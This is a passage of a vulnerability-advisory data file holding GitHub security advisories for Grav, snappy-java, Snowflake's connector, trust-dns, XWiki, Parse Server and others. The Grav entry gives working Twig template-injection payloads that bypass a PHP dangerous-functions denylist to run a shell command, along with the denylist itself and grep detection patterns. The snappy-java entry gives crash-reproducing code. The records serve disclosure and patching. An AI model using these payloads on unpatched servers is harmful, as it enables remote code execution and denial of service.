'link',
'mkdir',
'move_uploaded_file',
'rename',
'rmdir',
'symlink',
'tempnam',
'touch',
'unlink',
'imagepng',
'imagewbmp',
'image2wbmp',
'imagejpeg',
'imagexbm',
'imagegif',
'imagegd',
'imagegd2',
'iptcembed',
'ftp_get',
'ftp_nb_get',
];
static $fileContentFunctions = [
'file_get_contents',
'file',
'filegroup',
'fileinode',
'fileowner',
'fileperms',
'glob',
'is_executable',
'is_uploaded_file',
'parse_ini_file',
'readfile',
'readlink',
'realpath',
'gzfile',
'readgzfile',
'stat',
'imagecreatefromgif',
'imagecreatefromjpeg',
'imagecreatefrompng',
'imagecreatefromwbmp',
'imagecreatefromxbm',
'imagecreatefromxpm',
'ftp_put',
'ftp_nb_put',
'hash_update_file',
'highlight_file',
'show_source',
'php_strip_whitespace',
];
static $filesystemFunctions = [
// read from filesystem
'file_exists',
'fileatime',
'filectime',
'filemtime',
'filesize',
'filetype',
'is_dir',
'is_file',
'is_link',
'is_readable',
'is_writable',
'is_writeable',
'linkinfo',
'lstat',
//'pathinfo',
'getimagesize',
'exif_read_data',
'read_exif_data',
'exif_thumbnail',
'exif_imagetype',
'hash_file',
'hash_hmac_file',
'md5_file',
'sha1_file',
'get_meta_tags',
];
if (in_array($name, $fileWriteFunctions)) {
return true;
}
if (in_array($name, $fileContentFunctions)) {
return true;
}
if (in_array($name, $filesystemFunctions)) {
return true;
}
return false;
}
~~~
The list of banned functions appears to be adapted from a [StackOverflow post](https://stackoverflow.com/a/3697776). While the denylist looks rather comprehensive, there are actually multiple issues with the denylist implementation:
1. There may be unsafe functions, be it built-in to PHP or user-defined, which are not be blocked. For example, `unserialize()` and aliases of blocked functions, such as `ini_alter()`, are not being included in the denylist.
2. A case-sensitive comparison is performed against the denylist, but PHP function names are case-insensitive. This allows using `filter('SYSTEM')` to trivially bypass the denylist validation check.
3. Fully qualified names can be used when referencing functions, allowing `filter('\system')` to trivially bypass the denylist validation checks.
## Exploit Conditions:
This vulnerability can be exploited if the attacker has access to:
1. an administrator account, or
2. a non-administrative user account with the following permissions granted:
- login access to Grav admin panel, and
- page creation or update rights
## Reproduction Steps:
1. Log in to Grav Admin using an administrator account.
2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user:
* Login to Admin - Allowed
* Page Update - Allowed
3. Log out of Grav Admin, and log back in using the account created in step 2.
4. Navigate to `http://<grav_installation>/admin/pages/home`.
5. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.
6. Under the `Content` tab, insert the following payload within the editor:
~~~twig
// Method 1: Using unserialize() to trigger system('id') call
// Serialized payloaed generated using the phpggc tool: ./phpggc -b Monolog/RCE7 system 'id'
// {{ 'TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aTowO319czoxMzoiACoAcHJvY2Vzc29ycyI7YToyOntpOjA7czozOiJwb3MiO2k6MTtzOjY6InN5c3RlbSI7fX0=' | base64_decode | array | filter('unserialize') }}
// Method 2: Trigger system('id') via case-insensitive function names
{{ ['id'] | filter('System') }}
// Method 3: Trigger system('id') via fully qualified names when referencing functions
{{ ['id'] | filter('\\system') }}
~~~
7. Click the Preview button. Observe that the output of the `id` shell command is returned in the preview.
## Suggested Mitigations:
It is recommended to review the list of functions, both default functions in PHP and user-defined functions, and include missing unsafe functions in the denylist. A non-exhaustive list of missing unsafe functions discovered is shown below:
- `unserialize()`
- `ini_alter()`
- `simplexml_load_file()`
- `simplexml_load_string()`
- `forward_static_call()`
- `forward_static_call_array()`
The `Utils::isDangerousFunction()` function in [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074) should also be patched to disallow usage of fully qualified names when specifying callables, as well as ensure that validation performed on the `$name` parameter is case-insensitive.
For example,
~~~diff php
...
abstract class Utils
{
...
/**
* @param string $name
* @return bool
*/
public static function isDangerousFunction(string $name): bool
{
...
+ if ($arrow instanceof Closure) {
+ return false;
+ }
+ $name = strtolower($name);
+ if (strpos($name, "\\") !== false) {
+ return false;
+ }
if (in_array($name, $commandExecutionFunctions)) {
return true;
}
if (in_array($name, $codeExecutionFunctions)) {
return true;
}
if (isset($callbackFunctions[$name])) {
return true;
}
if (in_array($name, $informationDiscosureFunctions)) {
return true;
}
if (in_array($name, $otherFunctions)) {
return true;
}
return static::isFilesystemFunction($name);
}
...
}
~~~
End users should also ensure that `twig.undefined_functions` and `twig.undefined_filters` properties in `/path/to/webroot/system/config/system.yaml` configuration file are set to `false` to disallow Twig from treating undefined filters/functions as PHP functions and executing them.
## Detection Guidance:
The following strategies may be used to detect potential exploitation attempts.
1. Searching within Markdown pages using the following shell command:
`grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\|\s*(filter|map|reduce))\s*\(' /path/to/webroot/user/pages/`
2. Searching within Doctrine cache data using the following shell command:
`grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\|\s*(filter|map|reduce))\s*\(' --include '*.doctrinecache.data' /path/to/webroot/cache/`
3. Searching within Twig cache using the following shell command:
`grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|twig_array_(filter|map|reduce))\s*\(' /path/to/webroot/cache/twig/`
4. Searching within compiled Twig template files using the following shell command:
`grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\|\s*(filter|map|reduce))\s*\(' /path/to/webroot/cache/compiled/files/`
Note that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.
## Credits:
Ngo Wei Lin ([@Creastery](https://twitter.com/Creastery)) & Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg))
The scheduled disclosure date is _**25th July, 2023**_. Disclosure at an earlier date is also possible if agreed upon by all parties.
Kindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report:
1. **CVE-2023-30592**
Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of unsafe functions, such as `unserialize()`, that are not blocked. This is a bypass of CVE-2022-2073.
2. **CVE-2023-30593**
Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of capitalised names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073.
3. **CVE-2023-30594**
Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of fully-qualified names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.42'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34253'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5'}, {'type': 'PACKAGE', 'url': 'https://github.com/getgrav/grav'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/'}, {'type': 'WEB', 'url': 'https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83'}] | {'cwe_ids': ['CWE-1336', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:36:52Z', 'nvd_published_at': None} |
1.4.0 | GHSA-pqr6-cmr2-h8hf | 2023-06-27T21:57:08Z | 2023-06-15T16:13:20Z | null | ['CVE-2023-34453'] | snappy-java's Integer Overflow vulnerability in shuffle leads to DoS | ## Summary
Due to unchecked multiplications, an integer overflow may occur, causing a fatal error.
## Impact
Denial of Service
## Description
The function [shuffle(int[] input)](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107) in the file [BitShuffle.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java) receives an array of integers and applies a bit shuffle on it. It does so by multiplying the length by 4 and passing it to the natively compiled shuffle function.
```java
public static byte[] shuffle(int[] input) throws IOException {
byte[] output = new byte[input.length * 4];
int numProcessed = impl.shuffle(input, 0, 4, input.length * 4, output, 0);
assert(numProcessed == input.length * 4);
return output;
}
```
Since the length is not tested, the multiplication by four can cause an integer overflow and become a smaller value than the true size, or even zero or negative. In the case of a negative value, a “java.lang.NegativeArraySizeException” exception will raise, which can crash the program. In a case of a value that is zero or too small, the code that afterwards references the shuffled array will assume a bigger size of the array, which might cause exceptions such as “java.lang.ArrayIndexOutOfBoundsException”.
The same issue exists also when using the “shuffle” functions that receive a double, float, long and short, each using a different multiplier that may cause the same issue.
## Steps To Reproduce
Compile and run the following code:
```java
package org.example;
import org.xerial.snappy.BitShuffle;
import java.io.*;
public class Main {
public static void main(String[] args) throws IOException {
int[] original = new int[0x40000000];
byte[] shuffled = BitShuffle.shuffle(original);
System.out.println(shuffled[0]);
}
}
```
The program will crash, showing the following error (or similar):
```
Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: Index 0 out of bounds for length 0
at org.example.Main.main(Main.java:12)
Process finished with exit code 1
```
Alternatively - compile and run the following code:
```java
package org.example;
import org.xerial.snappy.BitShuffle;
import java.io.*;
public class Main {
public static void main(String[] args) throws IOException {
int[] original = new int[0x20000000];
byte[] shuffled = BitShuffle.shuffle(original);
}
}
```
The program will crash with the following error (or similar):
```
Exception in thread "main" java.lang.NegativeArraySizeException: -2147483648
at org.xerial.snappy.BitShuffle.shuffle(BitShuffle.java:108)
at org.example.Main.main(Main.java:11)
``` | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.xerial.snappy:snappy-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.10.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.10.0'}}] | [{'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/security/advisories/GHSA-pqr6-cmr2-h8hf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34453'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/commit/820e2e074c58748b41dbd547f4edba9e108ad905'}, {'type': 'PACKAGE', 'url': 'https://github.com/xerial/snappy-java'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java'}] | {'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-15T16:13:20Z', 'nvd_published_at': None} |
1.4.0 | GHSA-5w5m-pfw9-c8fp | 2023-06-16T22:09:31Z | 2023-06-09T22:53:14Z | null | ['CVE-2023-34233'] | Snowflake Python Connector vulnerable to Command Injection | ### Issue
Snowflake was informed via our bug bounty program of a command injection vulnerability in the Snowflake Python connector via SSO browser URL authentication.
### Impacted driver package:
snowflake-connector-python
### Impacted version range:
before [Version 3.0.2](https://community.snowflake.com/s/article/Snowflake-Connector-for-Python-Release-Notes)
### Attack Scenario
In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution.
This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources.
### Solution
On March 23rd, 2023, Snowflake merged a patch that fixed a command injection vulnerability in the Snowflake Python connector via SSO browser URL authentication. The vulnerability affected the Snowflake Python connector before Version 3.0.2. We strongly recommend users upgrade to Version 3.0.2 as soon as possible via the following resources: [Snowflake Python Connector](https://docs.snowflake.com/en/developer-guide/python-connector/python-connector)
### Additional Information
If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team). | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'snowflake-connector-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-python/security/advisories/GHSA-5w5m-pfw9-c8fp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34233'}, {'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-python/pull/1480'}, {'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-python/commit/1cdbd3b1403c5ef520d7f4d9614fe35165e101ac'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/snowflake-connector-python/PYSEC-2023-88.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/snowflakedb/snowflake-connector-python'}] | {'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:53:14Z', 'nvd_published_at': None} |
1.4.0 | GHSA-5fm9-h728-fwpj | 2023-06-06T02:06:23Z | 2023-06-06T02:06:23Z | null | [] | trust-dns vulnerable to Remote Attackers causing Denial-of-Service (packet loops) with crafted DNS packets | trust-dns and trust-dns-server are vulnerable to remotely triggered denial-of-service attacks, consuming both network and CPU resources.
DNS messages with the QR=1 bit set are responded to with a `FormErr` response.
This allows creating a traffic loop, in which these `FormErr` responses are sent nonstop between vulnerable servers.
There are two scenarios how this can be exploited: 1) Create a loop between two instances of trust-dns, consuming network resources, or 2) consuming the CPU of a single instance.
With two instances *A* and *B* an attacker sends a DNS query with a spoofed source IP address to *A*.
*A* replies with a `FormErr` to *B*.
Now both servers with ping-pong the message back and forth until by chance the packet is dropped in the network.
Multiple spoofed packets can be sent by the attacker, increasing resource consumption.
A single server can get locked up replying to itself.
Same setup as above, but now *A* sends the reply to itself.
The packet is sent out as fast as the CPU and network stack manage.
This locks up a CPU core.
Multiple packets from the attacker consume multiple CPU cores.
| [] | [{'package': {'ecosystem': 'crates.io', 'name': 'trust-dns-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.22.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'trust-dns-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.23.0-alpha.2'}, {'fixed': '0.23.0-alpha.3'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/bluejekyll/trust-dns/pull/1952'}, {'type': 'PACKAGE', 'url': 'https://github.com/bluejekyll/trust-dns'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0041.html'}] | {'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:06:23Z', 'nvd_published_at': None} |
1.4.0 | GHSA-7vr7-cghh-ch63 | 2023-06-20T16:45:32Z | 2023-06-20T16:45:32Z | null | ['CVE-2023-34467'] | XWiki Platform may retrieve email addresses of all users | ### Impact
The mail obfuscation configuration was not fully taken into account and while the mail displayed to the end user was obfuscated:
- the rest response was also containing the mail unobfuscated
- user were able to filter and sort on the unobfuscated (allowing to infer the mail content)
The consequence was the possibility to retrieve the email addresses of all users even when obfuscated.
See https://jira.xwiki.org/browse/XWIKI-20333 for the reproduction steps.
### Patches
This has been patched in XWiki 14.10.4, XWiki 14.4.8, and XWiki 15.0-rc-1.
### Workarounds
The workaround is to modify the page `XWiki.LiveTableResultsMacros` following this [patch](https://github.com/xwiki/xwiki-platform/commit/71f889db9962df2d385f4298e29cfbc9050b828a#diff-5a739e5865b1f1ad9d79b724791be51b0095a0170cc078911c940478b13b949a).
### References
https://jira.xwiki.org/browse/XWIKI-20333
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
### Attribution
This vulnerability has been reported on Intigriti by @floerer | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livetable-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5-milestone-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livetable-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.4'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7vr7-cghh-ch63'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34467'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/71f889db9962df2d385f4298e29cfbc9050b828a#diff-5a739e5865b1f1ad9d79b724791be51b0095a0170cc078911c940478b13b949a'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20333'}] | {'cwe_ids': ['CWE-402', 'CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:45:32Z', 'nvd_published_at': None} |
1.4.0 | GHSA-6vf2-mfmr-qqqw | 2023-06-27T21:59:44Z | 2023-06-20T15:31:09Z | null | ['CVE-2020-21489'] | Liufee CMS File Upload vulnerability | File Upload vulnerability in Liufee CMS, AKA Feehicms v.2.0.8 allows a remote attacker to execute arbitrary code via the `/admin/index.php?r=admin-user%2Fupdate-self` component. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'feehi/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.8.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-21489'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/issues/46'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/commit/ecbfb0ca77874ead5b6e79b96a5e1f94e67475a9'}, {'type': 'PACKAGE', 'url': 'https://github.com/liufee/cms'}] | {'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:09:36Z', 'nvd_published_at': None} |
1.4.0 | GHSA-462x-c3jw-7vr6 | 2023-06-30T20:41:43Z | 2023-06-30T20:41:43Z | null | ['CVE-2023-36475'] | Parse Server vulnerable to remote code execution via MongoDB BSON parser through prototype pollution | ### Impact
An attacker can use this prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser.
### Patches
Prevent prototype pollution in MongoDB database adapter.
### Workarounds
Disable remote code execution through the MongoDB BSON parser.
### Credits
- Discovered by hir0ot working with Trend Micro Zero Day Initiative
- Fixed by dbythy
- Reviewed by mtrezza
### References
- https://github.com/parse-community/parse-server/security/advisories/GHSA-462x-c3jw-7vr6
- https://github.com/advisories/GHSA-prm5-8g2m-24gg
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.2.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/security/advisories/GHSA-462x-c3jw-7vr6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36475'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/issues/8674'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/issues/8675'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/commit/3dd99dd80e27e5e1d99b42844180546d90c7aa90'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/commit/5fad2928fb8ee17304abcdcf259932f827d8c81f'}, {'type': 'PACKAGE', 'url': 'https://github.com/parse-community/parse-server'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/releases/tag/5.5.2'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/releases/tag/6.2.1'}] | {'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:41:43Z', 'nvd_published_at': None} |
1.4.0 | GHSA-784x-7w88-w564 | 2023-06-19T22:46:34Z | 2023-06-19T06:30:42Z | null | ['CVE-2023-34602'] | JeecgBoot vulnerable to SQL injection in queryTableDictItemsByCode | JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component `queryTableDictItemsByCode` in method `org.jeecg.modules.api.controller.SystemApiController`. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34602'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/4983'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/commit/dd7bf104e7ed59142909567ecd004335c3442ec5'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}] | {'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T22:46:34Z', 'nvd_published_at': None} |
1.4.0 | GHSA-5wrg-8fxp-cx9r | 2023-06-21T22:06:22Z | 2023-06-21T22:06:22Z | null | [] | passport-wsfed-saml2 Signature Bypass vulnerability | ## Information
Please note that this is not a new disclosure, and is previously reported in our [SECURITY-NOTICE.md](https://github.com/auth0/passport-wsfed-saml2/commit/520b9fc0bb4249ce83bec47e30153419f086ab70
) which we removed in favor of github advisory.
# Overview
A vulnerability was found in the validation of a SAML signature. The validation doesn't ensure that the "Signature" tag is at the proper location inside an "Assertion" tag. This leads to a signature relocation attack where the attacker can corrupt one field of data while maintaining the signature valid. This could allow an authenticated attacker to "remove" one group from the assertion or corrupt another field of an assertion.
# Am I affected?
You are affected if you are using the passport-wsfed-saml2 library to version < 3.0.10
# How do I fix it?
You may fix this issue by upgrading passport-wsfed-saml2 library to version 3.0.10 or above.
# Will the fix impact my users?
This fix patches the library that your application runs, but will not impact your users, their current state, or any existing sessions.
| [] | [{'package': {'ecosystem': 'npm', 'name': 'passport-wsfed-saml2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.10'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/auth0/passport-wsfed-saml2/security/advisories/GHSA-5wrg-8fxp-cx9r'}, {'type': 'WEB', 'url': 'https://github.com/auth0/passport-wsfed-saml2/pull/79'}, {'type': 'WEB', 'url': 'https://github.com/auth0/passport-wsfed-saml2/commit/f75211d42d2586a0d24a9da29ba8590e42363500'}, {'type': 'PACKAGE', 'url': 'https://github.com/auth0/passport-wsfed-saml2'}] | {'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:06:22Z', 'nvd_published_at': None} |
1.4.0 | GHSA-8jxm-xp43-qh3q | 2023-06-30T20:22:45Z | 2023-06-21T22:08:34Z | null | ['CVE-2023-34758'] | Silver vulnerable to MitM attack against implants due to a cryptography vulnerability | ### Summary
The current cryptography implementation in Sliver up to version 1.5.39 allows a MitM with access to the corresponding implant binary to execute arbitrary codes on implanted devices via intercepted and crafted responses. (Reserved CVE ID: CVE-2023-34758)
### Details
Please see [the PoC repo](https://github.com/tangent65536/Slivjacker).
### PoC
Please also see [the PoC repo](https://github.com/tangent65536/Slivjacker).
To setup a simple PoC environment,
1. Generate an implant with its C2 set to the PoC server's address and copy the embedded private implant key and public server key into the config json.
2. Run the implant on a separate VM and a `notepad.exe` window should pop up on the implanted VM.
### Impact
A successful attack grants the attacker permission to execute arbitrary code on the implanted device.
### References
https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go
https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go
https://github.com/tangent65536/Slivjacker
### Credits
[Ting-Wei Hsieh](https://github.com/tangent65536) from [CHT Security Co. Ltd.](https://www.chtsecurity.com/?lang=en) | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/bishopfox/sliver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.40'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/BishopFox/sliver/security/advisories/GHSA-8jxm-xp43-qh3q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34758'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35170'}, {'type': 'WEB', 'url': 'https://github.com/BishopFox/sliver/commit/2d1ea6192cac2ff9d6450b2d96043fdbf8561516'}, {'type': 'PACKAGE', 'url': 'https://github.com/BishopFox/sliver'}, {'type': 'WEB', 'url': 'https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go'}, {'type': 'WEB', 'url': 'https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go'}, {'type': 'WEB', 'url': 'https://github.com/BishopFox/sliver/releases/tag/v1.5.40'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-8jxm-xp43-qh3q'}, {'type': 'WEB', 'url': 'https://github.com/tangent65536/Slivjacker'}, {'type': 'WEB', 'url': 'https://www.chtsecurity.com/news/04f41dcc-1851-463c-93bc-551323ad8091'}] | {'cwe_ids': ['CWE-327'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:08:34Z', 'nvd_published_at': None} |
